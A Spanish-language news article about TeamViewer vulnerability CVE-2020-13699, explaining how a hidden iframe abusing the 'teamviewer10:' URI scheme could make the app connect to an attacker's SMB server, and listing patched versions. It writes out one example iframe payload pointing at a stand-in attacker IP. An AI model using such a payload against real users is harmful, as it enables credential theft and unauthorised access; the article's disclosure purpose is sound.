Son muchas las herramientas que tenemos para conectarnos de forma remota a otro equipo. En los tiempos en los que vivimos esto es algo muy habitual y a lo que recurren muchos usuarios. Si hablamos de un programa muy popular ese es TeamViewer. En este artículo nos hacemos eco de un problema que afecta a este software y que pone en riesgo a los usuarios que lo utilizan. Este fallo permitiría a un atacante acceder a un ordenador.
Un fallo en TeamViewer permite el acceso de intrusos
Como decimos, TeamViewer es una importante herramienta que permite el acceso remoto a equipos en la red. Esta vez la noticia es que cuenta con una vulnerabilidad que pone en riesgo la seguridad de los usuarios. Permitiría que un posible intruso accediera a ese ordenador sin dejar rastro y poder llevar a cabo diferentes tipos de ataques.
Es una realidad que en muchas ocasiones surgen fallos de seguridad que afectan a todo tipo de software que utilizamos en nuestro día a día. Pueden comprometer nuestra privacidad y poner en riesgo los dispositivos. Estas vulnerabilidades generalmente reciben actualizaciones por parte de los desarrolladores. Eso es lo que ha ocurrido en este caso.
Desde TeamViewer se han apresurado en lanzar un parche para corregir este importante fallo. La vulnerabilidad ha sido registrada como CVE-2020-13699 y ha sido calificada de alta gravedad. Para ejecutar un ataque, un usuario necesitaría navegar a una página maliciosa que carga un iframe en el navegador web, posiblemente oculto o tan pequeño como un píxel, para evitar ser visto por un intruso. El iframe se carga a sí mismo usando el esquema de URI «teamviewer10:», que le dice al navegador que inicie la aplicación TeamViewer instalada en el equipo. Podéis visitar nuestro tutorial sobre compartir pantalla de PC por red local.
Estos esquemas de URI personalizados son utilizados por aplicaciones instaladas localmente que permiten al usuario iniciarlos desde su navegador. Por ejemplo, las URL que comienzan con «skype:» en el navegador iniciarían Skype. Otras aplicaciones de uso común como Slack, Zoom y Spotify usan estructuras de URI similares.
Lo que haría el atacante para aprovechar esta vulnerabilidad de TeamViewer, es establecer el atributo src del iframe en ‘teamviewer10: –play attacker-IP share fake.tvs’. Este comando lo que hace es que la aplicación de TeamViewer que esté instalada se conecte al servidor del atacante a través del protocolo SMB.
Acceder sin necesidad de contraseña
Hay que tener en cuenta también que un posible atacante no necesitaría conocer la contraseña del usuario. Podrían ser autenticados de forma automática y lograr así acceso.
Desde TeamViewer indicaron que este problema afectaba a varias versiones de esta herramienta para Windows. Concretamente afecta a las versiones 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 y 15.8.3. Sin embargo ya han lanzado el parche para todas ellas. Desde RedesZone recomendamos actualizar a la última versión. Esto es algo que debemos aplicar siempre en todo tipo de software que utilicemos. Podéis ver el anuncio en el canal oficial de TeamViewer donde hacen mención a que el problema ya está solucionado.
Como hemos mencionado, el trabajo en remoto se ha convertido en algo muy presente en nuestro día a día. Os dejamos algunos consejos para teletrabajar con seguridad.